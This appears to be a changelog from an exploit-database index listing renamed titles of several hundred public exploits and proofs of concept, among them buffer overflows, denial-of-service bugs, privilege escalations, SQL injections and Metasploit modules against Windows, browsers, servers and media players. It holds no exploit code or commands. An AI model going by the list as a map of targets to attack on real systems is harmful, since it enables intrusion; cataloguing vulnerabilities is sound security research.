DB: 2017-04-02
6 new exploits Microsoft Internet Explorer 11 - Crash PoC (1) Microsoft Internet Explorer 11 - Crash (PoC) (1) Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031) Microsoft Windows SQL Server - Remote Denial of Service (MS03-031) Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046) Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046) Microsoft Windows - MSDTC Service Remote Memory Modification PoC (MS05-051) Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051) Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (1) Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (1) Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (1) Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1) Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (3) Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3) Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (2) Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2) Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC (Metasploit) Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit) Microsoft Windows - DNS Resolution Remote Denial of Service PoC (MS06-041) Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041) Microsoft Excel - Malformed Palette Record Denial of Service PoC (MS07-002) Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002) BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow PoCs BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflow (PoCs) Visual Basic - 'vbe6.dll' Local Stack Overflow PoC / Denial of Service Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC) Microsoft Internet Explorer GDI+ - PoC (MS08-052) Microsoft Internet Explorer GDI+ - (PoC) (MS08-052) Microsoft Windows - GDI+ PoC (MS08-052) (2) Microsoft Windows - GDI+ (PoC) (MS08-052) (2) Microsoft Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046) GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/Denial of Service Microsoft Windows - InternalOpenColorProfile Heap Overflow (PoC) (MS08-046) GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray) Apple Safari - 'ARGUMENTS' Array Integer Overflow (PoC) (New Heap Spray) Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2) Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2) eZip Wizard 3.0 - Local Stack Buffer Overflow PoC (SEH) eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH) Chasys Media Player 1.1 - '.pls' Local Buffer Overflow PoC (SEH) Chasys Media Player 1.1 - '.pls' Local Buffer Overflow (PoC) (SEH) Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1) Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (1) Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (2) Mozilla Firefox XSL - Parsing Remote Memory Corruption (PoC) (2) Microsoft Internet Explorer - EMBED Memory Corruption PoC (MS09-014) Microsoft Internet Explorer - EMBED Memory Corruption (PoC) (MS09-014) DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow PoCs DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoCs) AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow PoC (SEH) AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH) MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC) otsAV DJ/TV/Radio - Multiple Local Heap Overflow PoCs otsAV DJ/TV/Radio - Multiple Local Heap Overflow (PoCs) JetAudio 7.5.3 COWON Media Center - '.wav' Crash Streaming Audio Player 0.9 - (skin) Local Stack Overflow PoC (SEH) Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow PoC (SEH) Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH) Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH) Tuniac 090517c - '.m3u' Local File Crash (PoC) HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH) HTML Email Creator & Sender 2.3 - Local Buffer Overflow (PoC) (SEH) PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (1) PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (2) PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (1) PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (2) BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow PoC (2) BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2) Eureka Email Client 2.2q - PoC Buffer Overflow Eureka Email Client 2.2q - Buffer Overflow (PoC) Microsoft Windows 7 / Server 2008 R2 - Remote Kernel Crash Microsoft Windows 7 / 2008 R2 - Remote Kernel Crash Picpuz 2.1.1 - Buffer Overflow Denial of Service/PoC Picpuz 2.1.1 - Buffer Overflow Denial of Service (PoC) Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones Total MultiMedia Features - Sony Ericsson Phones Denial of Service (PoC) Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service Mozilla Firefox 3.6 - (XML parser) Memory Corruption (PoC) / Denial of Service iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service/PoC iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service (PoC) RCA DCM425 Cable Modem - micro_httpd Denial of Service/PoC RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC) Free MP3 CD Ripper 2.6 - '.wav' PoC Free MP3 CD Ripper 2.6 - '.wav' (PoC) Anyzip 1.1 - '.zip' PoC (SEH) Anyzip 1.1 - '.zip' (PoC) (SEH) Microsoft Windows - SMB Client-Side Bug PoC (MS10-006) Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006) Webby WebServer - PoC SEH control Webby WebServer - SEH Control (PoC) FreeBSD 8.0 ftpd - off-by one PoC (FreeBSD-SA-10:05) FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off- By One (PoC) Microsoft Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free Microsoft Windows Vista/2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH) AoAAudioExtractor 2.0.0.0 - ActiveX (PoC) (SEH) Mozilla Firefox - Memory Corruption PoC (Simplified) Mozilla Firefox - (Simplified) Memory Corruption (PoC) Microsoft Windows - Win32k Pointer Dereferencement PoC (MS10-098) Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098) Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH) Elecard MPEG Player 5.7 - Local Buffer Overflow (PoC) (SEH) Microsoft Windows XP - WmiTraceMessageVa Integer Truncation PoC (MS11-011) Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011) Real player 14.0.2.633 - Buffer Overflow / Denial of ServiceExploit Real player 14.0.2.633 - Buffer Overflow / Denial of Service IrfanView 4.28 - .ICO With Transparent Colour Denial of Service / Remote Denial of Service IrfanView 4.28 - .ICO Without Transparent Colour Denial of Service / Remote Denial of Service IrfanView 4.28 - '.ICO' With Transparent Colour Denial of Service / Remote Denial of Service IrfanView 4.28 - '.ICO' Without Transparent Colour Denial of Service / Remote Denial of Service Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service Microsoft Windows Vista/2008 - 'nsiproxy.sys' Local Kernel Denial of Service D-Link DSL-2650U - Denial of Service/PoC D-Link DSL-2650U - Denial of Service (PoC) Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun PoC (MS11-077) Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077) Opera 11.52 - PoC Denial of Service Opera 11.52 - Denial of Service (PoC) Microsoft Win32k - Null Pointer De-reference PoC (MS11-077) Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077) Microsoft Windows - 'afd.sys' PoC (MS11-046) Microsoft Windows - 'afd.sys' (PoC) (MS11-046) Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034) Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034) Wyse - Machine Remote Power off (DOS) without any Privilege (Metasploit) Wyse - Unauthenticated Machine Remote Power Off )Denial of Service) (Metasploit) Microsoft Windows Server 2000/NT 4.0 - TCP/IP Printing Service Denial of Service Microsoft Windows NT 4/2000 - TCP/IP Printing Service Denial of Service Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference) Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC) FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1) FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2) FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3) FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4) FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5) FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1) FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2) FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3) FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4) FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5) Microsoft Windows Server 2000/NT - Terminal Server Service RDP Denial of Service Microsoft Windows NT / 2000 - Terminal Server Service RDP Denial of Service Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (1) Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (2) Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (1) Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (2) Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1) Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2) Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (1) Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (2) Microsoft PoCket Internet Explorer 3.0 - Denial of Service Microsoft Pocket Internet Explorer 3.0 - Denial of Service Microsoft Windows - HWND_BROADCAST PoC (MS13-005) Microsoft Windows - HWND_BROADCAST (PoC) (MS13-005) Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash (PoC) Apple Safari 3 for Windows - Document.Location Denial of Service Apple Safari 3 for Windows - 'Document.Location' Denial of Service PotPlayer 1.5.42509 Beta - Denial of Service (Integer Division by Zero Exploit) PotPlayer 1.5.42509 Beta - Integer Division by Zero Denial of Service Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow Android Web Browser - GIF File Heap Based Buffer Overflow Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow Android Web Browser - BMP File Integer Overflow Google Android Web Browser - '.BMP' File Integer Overflow Gold MP4 Player 3.3 - Buffer Overflow PoC (SEH) Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH) Microsoft Windows Server 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash PoC (MS14-035) Microsoft Internet Explorer 8 / 9 / 10 - CInput Use-After-Free Crash (PoC) (MS14-035) Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035) Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035) Microsoft Internet Explorer - Memory Corruption PoC (MS14-029) Microsoft Internet Explorer - Memory Corruption (PoC) (MS14-029) UniPDF 1.1 - Crash (PoC) (SEH) Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC) Microsoft Windows - 'HTTP.sys' PoC (MS15-034) Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034) UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC) Microsoft Internet Explorer 11 - Crash PoC (2) Microsoft Internet Explorer 11 - Crash (PoC) (2) Apple macOS/IOS 10.12.2(16C67) - mach_msg Heap Overflow Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation Microsoft Windows - NtClose DeadLock PoC (MS06-030) Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030) Microsoft Windows - NtClose DeadLock (PoC) (MS06-030) Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation (PoC) (MS06-030) PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - 'zip://' URL Wrapper Buffer Overflow Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH) Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow (PoC) (SEH) Streaming Audio Player 0.9 - (skin) Local Stack Overflow (SEH) Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (SEH) Tuniac 090517c - '.m3u' Local File Crash (PoC) Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (1) Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1) Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (1) Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit) Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3) Microsoft HTML Help Workshop 4.74 - '.hhp' Index Buffer Overflow (Metasploit) (3) Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2) Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2) Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2) Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (2) Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2) Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4) Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4) Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (without egg-hunter) (Metasploit) Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow (Without Egg-Hunter) (Metasploit) PHP 5.3.6 - Buffer Overflow PoC (ROP) PHP 5.3.6 - Buffer Overflow (ROP) (PoC) Microsoft Windows Server 2000/NT 4 - DLL Search Path Microsoft Windows NT 4/2000 - DLL Search Path Microsoft Windows Server 2000/NT 4 - NTFS File Hiding Microsoft Windows NT 4/2000 - NTFS File Hiding Microsoft Windows Server 2000/NT 4.0 - Process Handle Local Privilege Elevation Microsoft Windows NT 4/2000 - Process Handle Local Privilege Elevation Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (1) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (2) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (3) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (4) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (5) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (6) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (7) Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (8) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (1) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (2) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (3) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (4) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (5) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (6) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (7) Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (8) Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (1) Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (2) Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (1) Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (2) Microsoft Windows Server 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011) Microsoft Windows NT 4/2000 - Local Descriptor Table Privilege Escalation (MS04-011) Microsoft Windows Server 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020) Microsoft Windows NT 4/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020) PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_parameters' Argument Arbitrary File Creation Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit) Microsoft Windows Server 2003/2008/XP/Vista - WMI Service Isolation Privilege Escalation Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit) Adobe Reader for Android - 'addJavascriptInterface' Exploit (Metasploit) UniPDF 1.1 - Crash PoC (SEH overwritten) Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC) UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC) Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052) Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (PoC) (MS15-052) Android - get_user/put_user Exploit (Metasploit) Google Android - get_user/put_user Exploit (Metasploit) Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#) Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#) Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit) Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (2) Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit) Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit) MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit) MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit) ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (1) Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit) Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit) MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (1) Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit) Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit) MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit) Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (2) Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (2) Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit) Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1) D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1) Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (2) Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027) Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027) CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (1) CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow ImageStation - 'SonyISUpload.cab' 1.0.0.38 ActiveX Buffer Overflow IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069) Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069) Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption PoC (MS09-002) Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002) Apple Mac OSX - Java applet Remote Deserialization Remote PoC (2) Apple Mac OSX - Java applet Remote Deserialization Remote (PoC) (2) Microsoft Windows live messenger plus! fileserver 1.0 - Directory Traversal Microsoft Windows Live Messenger Plus! Fileserver 1.0 - Directory Traversal JetAudio 7.5.3 COWON Media Center - '.wav' Crash DistCC Daemon - Command Execution (Metasploit) (1) DistCC Daemon - Command Execution (Metasploit) Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit) mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit) Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit) mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit) Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1) Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) Veritas NetBackup - Remote Command Execution (Metasploit) (1) Veritas NetBackup - Remote Command Execution (Metasploit) Pegasus Mail Client 4.51 - PoC Buffer Overflow Pegasus Mail Client 4.51 - Buffer Overflow (PoC) Irix LPD tagprinter - Command Execution (Metasploit) (1) Irix LPD tagprinter - Command Execution (Metasploit) Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (1) Xtacacsd 4.1.2 - 'report()' Buffer Overflow (Metasploit) Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1) Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (2) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) Tandberg E & EX & C Series Endpoints - Default Credentials for Root Account Tandberg E & EX & C Series Endpoints - Default Root Account Credentials Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2) Veritas NetBackup - Remote Command Execution (Metasploit) (2) Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (2) Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1) D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2) Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2) CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1) CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2) Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1) CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2) httpdx - tolog() Function Format String (Metasploit) (1) httpdx - 'tolog()' Function Format String (Metasploit) (1) Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1) Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) httpdx - tolog() Function Format String (Metasploit) (2) httpdx - 'tolog()' Function Format String (Metasploit) (2) Irix LPD tagprinter - Command Execution (Metasploit) (2) Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2) DistCC Daemon - Command Execution (Metasploit) (2) HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056) HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055) HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution (PoC) HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution (PoC) Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1) Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1) Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit) Opera 10/11 - Bad Nesting with Frameset Tag Memory Corruption (Metasploit) Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2) Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2) HP SiteScope - Remote Code Execution (Metasploit) (1) HP SiteScope (Linux/Windows) - Remote Code Execution (Metasploit) Microsoft Windows Server 2000/NT 4/XP - Help Facility ActiveX Control Buffer Overflow Microsoft Windows XP/2000/NT 4 - Help Facility ActiveX Control Buffer Overflow Microsoft Windows Server 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow Microsoft Windows NT 4/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow thttpd 2.2x - defang Remote Buffer Overflow thttpd 2.2x - 'defang' Remote Buffer Overflow Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2) Novell ZENworks Configuration Management 10 SP3 / 11 SP2 - Remote Execution (Metasploit) Dovecot with Exim - sender_address Parameter Remote Command Execution Dovecot with Exim - 'sender_address' Parameter Remote Command Execution HP SiteScope - Remote Code Execution (Metasploit) (2) HP SiteScope (Windows) - Remote Code Execution (Metasploit) Western Digital Arkeia - Remote Code Execution (Metasploit) (1) Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit) CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2) Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit) Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (1) Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) Western Digital Arkeia - Remote Code Execution (Metasploit) (2) Western Digital Arkeia < 11.0.12 - Remote Code Execution (Metasploit) Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1) E-Uploader Pro 1.0 - Image Upload with Code Execution E-Uploader Pro 1.0 - Image Upload / Code Execution ASPapp Knowledge Base - 'CatId' Parameter SQL Injection ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (1) ASPapp KnowledgeBase - 'catid' Parameter SQL Injection ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (2) ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99) ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion (c99) Flatchat 3.0 - 'pmscript.php with' Local File Inclusion Flatchat 3.0 - 'pmscript.php' Local File Inclusion Joomla! Component huruhelpdesk - SQL Injection Joomla! Component Huru Helpdesk - SQL Injection (1) PGAUTOPro - SQL Injection / Cross-Site 